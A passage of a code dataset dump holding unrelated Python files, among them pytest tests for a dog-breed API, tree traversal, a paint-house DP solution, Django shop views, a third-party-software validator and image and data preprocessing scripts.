self.relu:\n\n self.apply_nonlinear_transformation(lambda point: list(\n map(lambda x: max(x, 0), point)), run_time=6)\n self.wait()\n\n self.apply_nonlinear_transformation(self.func2, run_time=6)\n self.wait()\n\n\nclass FoldTransform(RandomTransform):\n CONFIG = {\"relu\": True}\n\n def func(self, point):\n x, y, z = point\n inp = torch.tensor(point[:2], dtype=torch.float32)\n y, h, z = model(inp)\n x = z.detach().numpy()\n return 2 * (x * RIGHT)\n\n def func2(self, point):\n x, y, z = point\n inp = torch.tensor(point[:1], dtype=torch.float32)\n y = model.linear2(inp)\n x, y = y.detach().numpy()\n return 2.5 * (x * RIGHT + y * UP)\n","sub_path":"part1/212.py","file_name":"212.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"505372736","text":"#Write a program that takes 5 numbers as an input, puts them into a list, then modifies that list so each element is replaced with its square. 
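# On the part1/212.py record above: the relu branch of FoldTransform animates
# max(x, 0) per coordinate, i.e. ReLU folds every point into the non-negative
# quadrant. The same map on raw points, outside the animation:
import numpy as np

pts = np.array([[-1.0, 2.0], [0.5, -3.0]])
folded = np.maximum(pts, 0.0)  # [[0., 2.], [0.5, 0.]]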
(2 becomes 4, 5 becomes 25) and such.\n#(put it on your github, in the / homework folder)\n\n#taken from stackoverflow: https://stackoverflow.com/questions/56920836/how-to-replace-every-element-in-a-given-list-to-its-square-and-not-create-a-new\ndef square_list(list_1):\n for i in range(len(list_1)):\n list_1[i] = list_1[i]**2\n\n\nmy_list = [1, 2, 3, 4, 5]\nsquare_list(my_list)\nprint(my_list)\n","sub_path":"Homework/Homework3.py","file_name":"Homework3.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"535198493","text":"import pytest\nfrom yaml import safe_load\nfrom pprint import pprint\nfrom lib.helper import get_request\nfrom test_data_lib.data import Breeds\nfrom test_data_lib.schema import BreedsSchema\nfrom jsonschema import validate\n\n\n@pytest.fixture(scope=\"module\")\ndef data_setup():\n global data\n\n with open(file=\"./test_data_lib/api_test_data.yaml\") as f:\n data = safe_load(f).get(\"dog_apis\")\n\n\n@pytest.fixture(scope=\"session\", autouse=True)\ndef breeds():\n return Breeds()\n\n\n@pytest.fixture(scope=\"session\", autouse=True)\ndef breeds_schema():\n return BreedsSchema()\n\n\ndef test_get_all_breeds(data_setup, breeds, breeds_schema):\n \"\"\" Return a list of all dog breeds \"\"\"\n\n results, status_code = get_request(url=data.get(\"all_breeds\"))\n assert status_code == 200\n assert results.get(\"message\") == breeds.all_breeds\n validate(instance=results, schema=breeds_schema.all_breeds_schema)\n\n\ndef test_verify_retriever_breed(data_setup):\n \"\"\" Verify that the retriever breed is in the list \"\"\"\n\n results, status_code = get_request(url=data.get(\"all_breeds\"))\n breed = results.get(\"message\").keys()\n assert status_code == 200\n assert \"retriever\" in breed\n\n\ndef test_get_retriever_sub_breeds(data_setup, breeds, breeds_schema):\n \"\"\" Return a list of all retriever sub-breeds \"\"\"\n\n breed_url = data.get(\"sub_breed\")\n results, status_code = get_request(url=breed_url.format(breed=\"retriever\"))\n assert status_code == 200\n assert results.get(\"message\") == breeds.sub_breeds\n validate(instance=results, schema=breeds_schema.sub_breeds_schema)\n\n\ndef test_get_random_image_golden_retriever(data_setup):\n \"\"\" Return a random image link to a golden retriever image \"\"\"\n\n random_image_url = data.get(\"sub_breed_random_image\")\n results, status_code = get_request(url=random_image_url.format(breed=\"retriever\", sub_breed=\"golden\"))\n assert status_code == 200\n\n\ndef test_cannot_get_sub_breeds(data_setup, breeds, breeds_schema):\n \"\"\" Verify that requesting sub-breeds of an unknown breed returns 404 \"\"\"\n\n breed_url = data.get(\"sub_breed\")\n results, status_code = get_request(url=breed_url.format(breed=\"jack_russel\"))\n assert status_code == 404\n assert results.get(\"message\") == 'Breed not found (master breed does not exist)'\n validate(instance=results, schema=breeds_schema.error_response_schema)\n","sub_path":"tests/test_get_dog_breeds.py","file_name":"test_get_dog_breeds.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"545745646","text":"# Writing Tree Level wise\r\n'''\r\n F\r\n / \\\r\n D J\r\n / \\ / \\\r\n B E G K\r\n / \\ \\\r\n A C I\r\n /\r\n H\r\n\r\nLevel Node\r\n1 F\r\n2 D,J \r\n3 B,E,G,K\r\n4 A,C,I\r\n5 H\r\n\r\nOrder\r\nF,D,J,B,E,G,K,A,C,I,H\r\n\r\n'''\r\n# Code:\r\n\r\nclass Node:\r\n def 
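# On tests/test_get_dog_breeds.py above: every request is paired with
# jsonschema.validate against a schema object. The same idea in isolation,
# with a made-up schema (the project's BreedsSchema is not shown here):
from jsonschema import ValidationError, validate

schema = {'type': 'object',
          'properties': {'status': {'type': 'string'}},
          'required': ['status']}
try:
    validate(instance={'status': 'success'}, schema=schema)
except ValidationError as err:
    print('payload does not match:', err.message)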
__init__(self,data):\r\n self.data=data\r\n self.left=self.right=None\r\n\r\ndef LevelOrder(root):\r\n if root is None:\r\n return\r\n l=[]\r\n l.append(root)\r\n while len(l)>0:\r\n temp = l.pop(0)\r\n print(temp.data, end=\" \")\r\n if temp.left:\r\n l.append(temp.left)\r\n if temp.right:\r\n l.append(temp.right)\r\n\r\nroot = Node(\"F\") \r\nroot.left = Node('D')\r\n\r\nroot.right = Node('J')\r\n\r\nroot.left.left = Node('B') \r\nroot.left.right = Node('E')\r\n\r\nroot.right.left = Node('G') \r\nroot.right.right = Node('K')\r\n\r\nroot.left.left.left =Node('A') \r\nroot.left.left.right = Node('C')\r\n\r\nroot.right.left.right = Node('I') \r\nroot.right.left.right.left = Node('H') \r\nprint(\"Level order traversal is \") \r\nLevelOrder(root)\r\n \r\n \r\n","sub_path":"Binary Tree/LevelOrderTraversal.py","file_name":"LevelOrderTraversal.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"397630282","text":"# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0\n\nfrom typing import List\nimport shutil\n\nfrom pre_wigs_validation.enums import ValidationEnforcement, ValidationResult\nfrom pre_wigs_validation.instance import ValidationInstance\nfrom pre_wigs_validation.dataclasses import ValidationOutput\nfrom pre_wigs_validation.utils import check_validation_config\n\nclass ThirdPartySoftware:\n \"\"\"\n Validate that third-party software components which would conflict\n with AMS components have been removed, such as anti-virus clients,\n backup clients, virtualization software, and access management software.\n \"\"\"\n\n validation = \"Third Party Software\"\n enforcement = ValidationEnforcement.REQUIRED\n software_list = [\n \"ma\",\n \"cma\",\n \"aex-bootstrap\",\n \"aex-configure\",\n \"aex-diagnostics\",\n \"aex-env\",\n \"aex-uninstall\",\n \"aex-helper\",\n \"aex-cta\",\n \"pbis\",\n \"domainjoin-cli\",\n \"adinfo\",\n \"adcheck\",\n \"adquery\",\n \"vmware-toolbox-cmd\",\n \"vmware-user\",\n \"realmd\"\n ]\n\n @classmethod\n def validate(\n cls,\n *,\n custom_software_list: List[str] = None,\n enabled: bool = True,\n instance: ValidationInstance,\n ) -> ValidationOutput:\n\n \"\"\"\n Parameters:\n custom_software_list (List[str]): a list of additional blacklisted binaries to search for\n enabled (bool): whether or not to run this validation function\n instance (ValidationInstance): the instance object being validated\n\n Returns:\n ValidationOutput: output of validation\n \"\"\"\n\n if not enabled:\n return ValidationOutput(\n validation=cls.validation,\n result=ValidationResult.NOT_RUN,\n enforcement=cls.enforcement,\n )\n\n pass_message = \"Unwanted software may exist, but nothing was found\"\n fail_message = \"Please remove the following software: \"\n config = check_validation_config(\n default_params=cls.validate.__kwdefaults__, local_params=locals()\n )\n\n # paths = [\"/usr/bin/\", \"/usr/local/bin/\", \"/opt/\", \"/usr/local/\"]\n # empty_message = \"No software provided in config file\"\n\n total_software_list = cls.software_list\n if custom_software_list is not None:\n total_software_list += custom_software_list\n\n failed = False\n for software in total_software_list:\n if shutil.which(software) is not None:\n failed = True\n fail_message += f\"{software}, \"\n\n if not failed:\n return ValidationOutput(\n validation=cls.validation,\n result=ValidationResult.PASS,\n enforcement=cls.enforcement,\n config=config,\n 
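# On LevelOrderTraversal.py above: list.pop(0) shifts the whole list, so each
# dequeue costs O(n). collections.deque gives O(1) popleft - a sketch of the
# same traversal, reusing the Node class defined in that record:
from collections import deque

def level_order(root):
    queue = deque([root] if root else [])
    while queue:
        node = queue.popleft()
        print(node.data, end=' ')
        if node.left:
            queue.append(node.left)
        if node.right:
            queue.append(node.right)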
message=pass_message,\n )\n fail_message = fail_message[0:-2]\n return ValidationOutput(\n validation=cls.validation,\n result=ValidationResult.FAIL,\n enforcement=cls.enforcement,\n config=config,\n message=fail_message,\n )\n","sub_path":"wigs-validation-linux/pre_wigs_validation/third_party_software.py","file_name":"third_party_software.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"183505763","text":"from fortran_generator.code_segments import NAME_CONTAINS, NAME_END\n\ndef normal_block_to_string(the_block):\n result = the_block.type_tag + ' ' + the_block.name + '\\n'\n for a_child in the_block.children_before_contains:\n result += a_child.to_string()\n result += NAME_CONTAINS + '\\n'\n for a_child in the_block.children_after_contains:\n result += a_child.to_string()\n result += (NAME_END + ' ' + the_block.type_tag + ' ' + the_block.name + '\\n')\n return result\n\n\n","sub_path":"fortran_generator/code_segments/code_generator.py","file_name":"code_generator.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"491328452","text":"def possible_moves(node, game_map):\r\n \"\"\"\r\n Finds the possible neighbors of a node given the map\r\n \"\"\"\r\n y, x = node\r\n neighs = []\r\n\r\n for i in [(y+1, x), (y-1, x), (y, x+1), (y, x-1)]: # Creates the list of tuples of possible neighbors\r\n if 0 <= i[0] < len(game_map) and 0 <= i[1] < len(game_map[0]): # If it's inside the map, keep it\r\n neighs.append(i) # add it to neighbors\r\n neighs = list(filter(lambda x: game_map[x[0]][x[1]] > -99, neighs)) # filter out walls\r\n return list(neighs) # force it to be a list\r\n\r\n\r\ndef bellman(node, game_map, gamma=0.9):\r\n \"\"\"\r\n This gives you the expected reward for a given best action at a node.\r\n Naively explores the graph with a whatever-first search, returning the best expected value for each choice.\r\n Not a good example of how this really works, mostly just a math demo!\r\n \"\"\"\r\n print(node)\r\n y, x = node # Unpack the node tuple\r\n\r\n if game_map[y][x] == 1 or game_map[y][x] == -1:\r\n print('Reward found!', str(float(game_map[y][x]) * gamma))\r\n return float(game_map[y][x]) * gamma # If it's a reward, return it times gamma\r\n\r\n expected = []\r\n\r\n for neigh in possible_moves(node, game_map):\r\n temp_map = [[point for point in submap] for submap in game_map] # deep copy the stupid map\r\n temp_map[y][x] = -99 # Mark the node on the map\r\n\r\n expected.append(bellman(neigh, temp_map, gamma) * gamma)\r\n print(f\"Back to {node}\")\r\n return float(max(expected)) if len(expected) else -999 # return huge neg if none found\r\n\r\n\r\n# Map visual - https://i.imgur.com/jd1uMVq.png\r\n# Video credit - https://www.youtube.com/watch?v=14BfO5lMiuk\r\ngame_map = [[0, 0, 0, 1],\r\n [0, -99, 0, -1],\r\n [0, 0, 0, 0]]\r\n# Note here that the coordinates are functionally backwards and upside down-\r\n# 0,0 is the top left corner, 3,2 is the bottom right.\r\n\r\nprint(bellman((2, 0), game_map)) # change the point to see how it varies\r\n# I left the print statements so you can see how the graph is explored\r\n","sub_path":"bellman_maze.py","file_name":"bellman_maze.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"235714389","text":"import tensorflow as tf\nimport numpy as np\nimport 
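# On bellman_maze.py above: gamma is applied once when a reward is returned
# and once more per step on the way back, so a reward r reached in k moves is
# worth r * gamma**(k + 1) at the start node. On the sample map the +1 goal
# is 5 moves from (2, 0), hence the value the recursion reports there:
gamma = 0.9
value = 1.0 * gamma ** (5 + 1)
assert abs(value - 0.531441) < 1e-9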
os\nimport pickle\nimport pandas as pd\nimport pickle\n\nfrom sklearn.model_selection import train_test_split\nfrom keras.preprocessing import sequence\nfrom random import randint\n\ndef transY(array):\n result = 1\n if array[0]==1:\n result = 0\n \n return result\n\ndef LoadData(np_path, path_1, path_2):\n \n A = np.load(np_path+path_1)['arr_0']\n b = np.load(np_path+path_2)['arr_0']\n\n X_train, X_test, y_train, y_test = train_test_split(A, b, test_size=0.2)\n \n return X_train, X_test, y_train, y_test\n\ndef arraytoDf(array1, array2):\n\n seq = []\n seqLen = []\n sentiment = []\n\n for i in range(len(array1)):\n seq.append(array1[i])\n seqLen.append(len(array1[i]))\n sentiment.append(transY(array2[i]))\n\n dic = {'seq' : seq, 'seqLength' : seqLen, 'sentiment' : sentiment}\n df = pd.DataFrame(dic, columns=['seq', 'seqLength', 'sentiment'])\n return df\n\nclass Data():\n def __init__(self, df):\n self.df = df\n self.size = len(self.df)\n self.epochs = 0\n self.shuffle()\n\n def shuffle(self):\n self.df = self.df.sample(frac=1).reset_index(drop=True)\n self.cursor = 0\n\n def next_batch(self, n):\n if self.cursor+n-1 > self.size:\n self.epochs += 1\n self.shuffle()\n res = self.df.ix[self.cursor:self.cursor+n-1]\n self.cursor += n\n return res['seq'], res['sentiment'], res['seqLength']\n \n#padding\nclass PaddedData(Data):\n def next_batch(self, n):\n if self.cursor+n > self.size:\n self.epochs += 1\n self.shuffle()\n res = self.df.ix[self.cursor:self.cursor+n-1]\n self.cursor += n\n\n # Pad sequences with 0s so they are all the same length\n maxlen = max(res['seqLength'])\n x = np.zeros([n, maxlen], dtype=np.int32)\n for i, x_i in enumerate(x):\n x_i[:res['seqLength'].values[i]] = res['seq'].values[i]\n\n return x, res['sentiment'], res['seqLength']\n \n\n\n","sub_path":"CODE/core/prepo.py","file_name":"prepo.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"352593039","text":"'''\r\n假如有一排房子,共 n 个,每个房子可以被粉刷成 k 种颜色中的一种,你需要粉刷所有的房子并且使其相邻的两个房子颜色不能相同。\r\n\r\n当然,因为市场上不同颜色油漆的价格不同,所以房子粉刷成不同颜色的花费成本也是不同的。每个房子粉刷成不同颜色的花费是以一个 n x k 的矩阵来表示的。\r\n\r\n例如,costs[0][0] 表示第 0 号房子粉刷成 0 号颜色的成本花费;costs[1][2] 表示第 1 号房子粉刷成 2 号颜色的成本花费,以此类推。请你计算出粉刷完所有房子最少的花费成本。\r\n\r\n注意:\r\n\r\n所有花费均为正整数。\r\n\r\n示例:\r\n\r\n输入: [[1,5,3],[2,9,4]]\r\n输出: 5\r\n解释: 将 0 号房子粉刷成 0 号颜色,1 号房子粉刷成 2 号颜色。最少花费: 1 + 4 = 5;\r\n 或者将 0 号房子粉刷成 2 号颜色,1 号房子粉刷成 0 号颜色。最少花费: 3 + 2 = 5.\r\n进阶:\r\n您能否在 O(nk) 的时间复杂度下解决此问题?\r\n'''\r\nfrom typing import List\r\n\r\nfrom leetcode.tools.time import printTime\r\n\r\n\r\nclass Solution:\r\n @printTime()\r\n def minCostII(self, costs: List[List[int]]) -> int:\r\n self.len = len(costs)\r\n self.k = len(costs[0])\r\n dp = [[0 for _ in range(self.k)] for _ in range(self.len)]\r\n dp[0] = costs[0]\r\n min1 = None\r\n min2 = None\r\n for i in range(self.k):\r\n if min1 is None and min2 is None:\r\n min1 = i\r\n elif min2 is None:\r\n if dp[0][i] <= dp[0][min1]:\r\n min2 = min1\r\n min1 = i\r\n else:\r\n min2 = i\r\n else:\r\n if dp[0][i] <= dp[0][min1]:\r\n min2 = min1\r\n min1 = i\r\n elif dp[0][i] < dp[0][min2]:\r\n min2 = i\r\n for i in range(1, self.len):\r\n t1 = None\r\n t2 = None\r\n for j in range(self.k):\r\n if j != min1:\r\n dp[i][j] = costs[i][j] + dp[i - 1][min1]\r\n else:\r\n dp[i][j] = costs[i][j] + dp[i - 1][min2]\r\n if t1 is None and t2 is None:\r\n t1 = j\r\n elif t2 is None:\r\n if dp[i][j] <= dp[i][t1]:\r\n t2 = t1\r\n t1 = j\r\n else:\r\n t2 = j\r\n else:\r\n if dp[i][j] <= dp[i][t1]:\r\n t2 = t1\r\n 
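# On CODE/core/prepo.py above: PaddedData right-pads each batch to the
# longest sequence in that batch. The core of that, stripped of the DataFrame
# plumbing (the token ids here are invented):
import numpy as np

seqs = [[4, 7], [1, 2, 3, 5]]
maxlen = max(len(s) for s in seqs)
batch = np.zeros((len(seqs), maxlen), dtype=np.int32)
for i, s in enumerate(seqs):
    batch[i, :len(s)] = s  # the remainder stays 0, the pad id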
t1 = j\r\n elif dp[i][j] < dp[i][t2]:\r\n t2 = j\r\n min1 = t1\r\n min2 = t2\r\n return dp[self.len - 1][min1]\r\n\r\ncosts = [[1,5,3],[2,9,4]]\r\nSolution().minCostII(costs)\r\nSolution()._1minCostII(costs)","sub_path":"leetcode/dynamic programming/5. 带维度单串dp[i][k],i为位置,k为附加维度/0265_H_粉刷房子 II_DP.py","file_name":"0265_H_粉刷房子 II_DP.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"163821141","text":"import processresults as pr\n\ntableau20 = [(31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120),\n (44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150),\n (148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148),\n (227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199),\n (188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)]\n\nfor i in range(len(tableau20)):\n r, g, b = tableau20[i]\n tableau20[i] = (r / 255., g / 255., b / 255.)\n\nDATA = [\"Helpdesk.csv\", \"BPIC12W.csv\", \"BPIC12.csv\", \"BPIC15_1_sorted_new.csv\", \"BPIC15_2_sorted_new.csv\",\n \"BPIC15_3_sorted_new.csv\", \"BPIC15_4_sorted_new.csv\", \"BPIC15_5_sorted_new.csv\"]\n# METHODS = [\"Tax\", \"Taymouri\", \"Camargo random\", \"Camargo argmax\", \"Lin\", \"Di Mauro\", \"EDBN\", \"Baseline\", \"Pasquadibisceglie\"]\n# METHODS = [\"Tax\", \"Camargo argmax\", \"Lin\", \"Di Mauro\", \"Pasquadibisceglie\", \"Taymouri\", \"EDBN\", \"Baseline\", \"New\", \"EDBN_update\"]\nMETHODS = [\"Tax\", \"Camargo argmax\", \"Lin\", \"Di Mauro\", \"Pasquadibisceglie\", \"Taymouri\", \"EDBN\", \"Baseline\"]\nSETTINGS = [\"Tax\", \"Camargo\", \"Lin\", \"Di Mauro\", \"Pasquadibisceglie\", \"Taymouri\", \"Baseline\"]\n\nscores = {}\nscores_detail = {}\n\nfor setting in SETTINGS:\n results = pr.read_result_file(\"paper_%s.txt\" % (setting.lower().replace(\" \", \"\")))\n scores[setting] = results[METHODS].mean().sort_values()\n scores_detail[setting] = results\n\nLATEX_ROW = {}\n\nfor setting in SETTINGS:\n score = scores[setting]\n i = 8\n for score_item in score.iteritems():\n print(score_item)\n if score_item[0] not in LATEX_ROW:\n LATEX_ROW[score_item[0]] = \"\"\n if i == 1:\n LATEX_ROW[score_item[0]] += \"& \\\\textbf{%i \\\\emph{(%.2f)}} \" % (i, score_item[1])\n else:\n LATEX_ROW[score_item[0]] += \"& %i \\\\emph{(%.2f)} \" % (i, score_item[1])\n i -= 1\n\nprint(\"OVERALL AVERAGE\")\nfor method in METHODS:\n print(method, LATEX_ROW[method], \"\\\\\\\\\")\n\n\nfor key in scores_detail:\n print(key)\n LATEX_ROW = {}\n\n cols = [\"data\"]\n cols.extend(METHODS)\n score = scores_detail[key][cols]\n print(\"\\\\begin{table*}\")\n print(\"\\\\scriptsize\")\n print(\"\\\\begin{tabular}{c | c c c c c c c c}\")\n\n print(\" & \".join(cols), end=\"\\\\\\\\\\n\")\n print(\"\\hline\")\n for score_item in score.iterrows():\n print(score_item[1][0].replace(\"_\", \"\\_\"), \"&\", \" & \".join([ \"%.2f\" % s if s != max(score_item[1][1:]) else \"\\\\textbf{%.2f}\" % s for s in list(score_item[1][1:])]), end=\"\\\\\\\\\\n\")\n print(\"\\\\end{tabular}\")\n print(\"\\\\end{table*}\")\n\n\n","sub_path":"Predictions_Results/Paper/process_paper.py","file_name":"process_paper.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"44291747","text":"import utils\nimport params\nimport cv2 as cv\nimport pdb\n\ndef predict(images=None, path_images=None, scale_factor=params.scale, 
interpolation_method=params.interpolation_method): \n\n if(type(images) != type(None)):\n original_image = images\n else:\n if(path_images == None):\n raise ValueError('if images is None path_images must not be none.')\n original_image = utils.read_all_images_from_directory(path_images) \n \n # standard resize\n downscaled_image = utils.resize_3d_image_standard(original_image, int(original_image.shape[0] / scale_factor), int(original_image.shape[1] / scale_factor), int(original_image.shape[2] / scale_factor))\n standard_resize = utils.resize_3d_image_standard(downscaled_image, int(original_image.shape[0]), int(original_image.shape[1]), int(original_image.shape[2]), interpolation_method=interpolation_method) \n \n num_images = standard_resize.shape[0]\n sum_ssim_standard = 0 \n sum_psnr_standard = 0 \n\n for index in range(num_images): \n psnr_standard = utils.psnr(original_image[index, :, :], standard_resize[index, :, :])\n ssim_standard = utils.ssim(original_image[index, :, :], standard_resize[index, :, :]) \n \n sum_ssim_standard += ssim_standard\n sum_psnr_standard += psnr_standard \n print('standard --- psnr = {} ssim = {}'.format(sum_psnr_standard, sum_ssim_standard)) \n return sum_psnr_standard, sum_ssim_standard, num_images\n \n\nlist_images = utils.read_all_directory_images_from_directory_test('./data/train') \nsum_ssim_standard = 0 \nsum_psnr_standard = 0 \nnum_images_all = 0\nfor images in list_images:\n psnr_standard, ssim_standard, num_images = predict(images=images, interpolation_method=cv.INTER_NEAREST)\n sum_ssim_standard += ssim_standard\n sum_psnr_standard += psnr_standard \n num_images_all += num_images\n \nprint('standard --- psnr = {} ssim = {}'.format(sum_psnr_standard / num_images_all, sum_ssim_standard / num_images_all)) ","sub_path":"cnn/HWD-resize/standard_resize.py","file_name":"standard_resize.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"96893877","text":"from django.shortcuts import render, get_object_or_404,redirect\nfrom django.http import HttpResponse\nfrom .models import Category, Product, Cart, CartItem\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth.models import Group, User\nfrom .forms import SignUpForm\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth import login, authenticate, logout\n\ndef home(request, category_slug = None):\n\tproducts=None\n\tcategory_page=None\n\tif category_slug != None:\n\t\tcategory_page = get_object_or_404(Category, slug = category_slug)\n\t\tproducts = Product.objects.filter(category=category_page, available=True)\n\telse:\n\t\tproducts = Product.objects.all().filter(available=True)\n\n\treturn render(request, 'home.html', {'products':products, 'category_page':category_page})\n\n\n\ndef product(request, category_slug, product_slug):\n\t\n\ttry:\n\t\tproduct = Product.objects.get(category__slug=category_slug, slug= product_slug)\n\n\texcept Exception as e:\n\t\traise e\n\n\treturn render(request, 'product.html',{'product': product})\n\n\ndef _cart_id(request):\n\t#создаем или получаем сессию\n\tcart = request.session.session_key\n\tif not cart:\n\t\tcart = request.session.create()\n\treturn cart\n\n\ndef add_cart(request, product_id):\n\tproduct = Product.objects.get(id= product_id)\n\t#создаем или получаем корзину из бд\n\ttry:\n\t\tcart= Cart.objects.get(cart_id=_cart_id(request))\n\texcept Cart.DoesNotExist:\n\t\tcart = 
Cart.objects.create(cart_id=_cart_id(request))\n\t\tcart.save()\n\t#добавление товара в корзину\n\ttry:\n\t\tcart_item= CartItem.objects.get(cart= cart, product=product)\n\t\tif cart_item.quantity < cart_item.product.stock:\n\t\t\tcart_item.quantity +=1\n\t\tcart_item.save()\n\t\n\texcept CartItem.DoesNotExist:\n\t\tcart_item= CartItem.objects.create(cart= cart, product=product, quantity=1)\n\t\tcart_item.save()\n\n\treturn redirect('cart_detail')\n\ndef cart_detail(request, total=0, counter=0, cart_items=None):\n\ttry:\n\t\t#получаем карзину и товары в корзине по сессии пользователя\n\t\tcart = Cart.objects.get(cart_id = _cart_id(request))\n\t\tcart_items = CartItem.objects.filter(cart=cart, )\n\t\t#счет итоговой стоимости и количества\n\t\tfor cart_item in cart_items:\n\t\t\ttotal += cart_item.product.price * cart_item.quantity\n\t\t\tcounter += cart_item.quantity \n\texcept ObjectDoesNotExist:\n\t\tpass\n\n\treturn render(request, 'cart.html', {'cart_items':cart_items,'total':total,'counter': counter})\n\n\ndef remove_cart(request, product_id):\n\tcart = Cart.objects.get(cart_id=_cart_id(request),)\n\tproduct = Product.objects.get(id= product_id) \n\tcart_item = CartItem.objects.get(product=product, cart=cart)\n\tif cart_item.quantity > 1:\n\t\tcart_item.quantity -= 1\n\t\tcart_item.save()\n\telse:\n\t\tcart_item.delete()\n\n\treturn redirect('cart_detail')\n\n\ndef remove_cart_product(request, product_id):\n\tcart = Cart.objects.get(cart_id=_cart_id(request),)\n\tproduct = Product.objects.get(id= product_id) \n\tcart_item = CartItem.objects.get(product=product, cart=cart)\n\tcart_item.delete()\n\treturn redirect('cart_detail')\n\n\ndef signUpView(request):\n\tif request.method == \"POST\":\n\t\tform = SignUpForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\tusername = form.cleaned_data.get('username')\n\t\t\tsignup_user= User.objects.get(username=username)\n\t\t\tuser_group = Group.objects.get(name='User')\n\t\t\tuser_group.user_set.add(signup_user)\n\n\telse:\n\t\tform= SignUpForm()\n\treturn render(request,'signup.html',{'form':form})\n\n\ndef loginView(request):\n\tif request.method == 'POST':\n\t\tform = AuthenticationForm(data=request.POST)\n\t\tif form.is_valid():\n\t\t\tusername= request.POST['username']\n\t\t\tpassword= request.POST['password']\n\t\t\tuser = authenticate(username=username, password=password)\n\t\t\tif user is not None:\n\t\t\t\tlogin(request, user)\n\t\t\t\treturn redirect('home')\n\t\t\telse:\n\t\t\t\treturn redirect('signup')\n\n\telse:\n\t\tform = AuthenticationForm()\n\t\treturn render(request, 'login.html', {'form':form})\n\n\ndef logoutView(request):\n\tlogout(request)\n\treturn redirect('login')","sub_path":"shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"616373006","text":"import mdfreader\nimport pandas\nimport sys\nimport os\ndef parseMDF(filename):\n if(os.path.exists(filename)):\n mdf=mdfreader.mdf(filename,channelList=['Epm_nEng','InjCtl_qSetUnBal'])\n mdf.convertToPandas(0.1)\n mdf['master_group'].to_csv(\"ss.csv\")\n print(\"done!\")\n else:\n print(\"Sorry, please check the filename. 
Usage: Python \" +__file__ + \" filename.mdf\")\n\n\n\nif __name__==\"__main__\":\n parseMDF(sys.argv[1])\n","sub_path":"readdata.py","file_name":"readdata.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"11295660","text":"from __future__ import with_statement\nfrom ..excel_comparsion_test import ExcelComparisonTest\nfrom ...workbook import Workbook\nfrom ...canvas import Canvas\n\n\nclass TestCompareXLSXFiles(ExcelComparisonTest):\n \"\"\"\n Test file created by XlsxWriter against a file created by Excel.\n\n \"\"\"\n\n def setUp(self):\n self.set_filename('simple01.xlsx')\n\n def test_create_file(self):\n \"\"\"Test the creation of a simple workbook.\"\"\"\n\n workbook = Workbook(self.got_filename)\n worksheet = workbook.add_worksheet()\n\n c = Canvas(2, 1)\n c.set_data(0, 0, 'Hello')\n c.set_data(1, 0, 123)\n\n c.write_to_sheet(workbook, worksheet)\n\n workbook.close()\n\n self.assertExcelEqual()\n\n def test_create_file_with_array(self):\n \"\"\"Test the creation of a simple workbook.\"\"\"\n\n workbook = Workbook(self.got_filename)\n worksheet = workbook.add_worksheet()\n\n c = Canvas(2, 1)\n c.set_data(0, 0, [['Hello'], [123]])\n\n c.write_to_sheet(workbook, worksheet)\n\n workbook.close()\n\n self.assertExcelEqual()\n","sub_path":"xlsxwriter/test/canvas/test_simple01.py","file_name":"test_simple01.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"47019132","text":"#!/usr/bin/env python3\nimport glob\nimport os\nimport h5py\nimport numpy as np\nimport cv2\n\nEMPTY_LABEL = \"empty\"\n\n\ndef load_image(filename):\n \"\"\" Load single image from file and preprocess. \"\"\"\n img = cv2.imread(filename, cv2.IMREAD_GRAYSCALE)\n # Apparently TensorFlow needs images transposed.\n img = cv2.transpose(img)\n # Normalize.\n (m, s) = cv2.meanStdDev(img)\n m = m[0][0]\n s = s[0][0]\n img = img - m\n img = img / s if s > 0 else img\n return img\n\n\ndef _to_label(filename):\n \"\"\" Image filenames are formatted as [value].[uuid].png\"\"\"\n prefix = os.path.basename(filename).split(\".\")[0]\n if prefix == EMPTY_LABEL:\n return \" \"\n return prefix\n\n\ndef _save_h5(filename, images, labels):\n with h5py.File(filename, \"w\") as hf:\n hf.create_dataset(\"images\", data=images)\n hf.create_dataset(\"labels\", data=labels)\n\n\ndef archive(source_dir, output):\n img_files = glob.glob(f\"{source_dir}/*png\")\n imgs 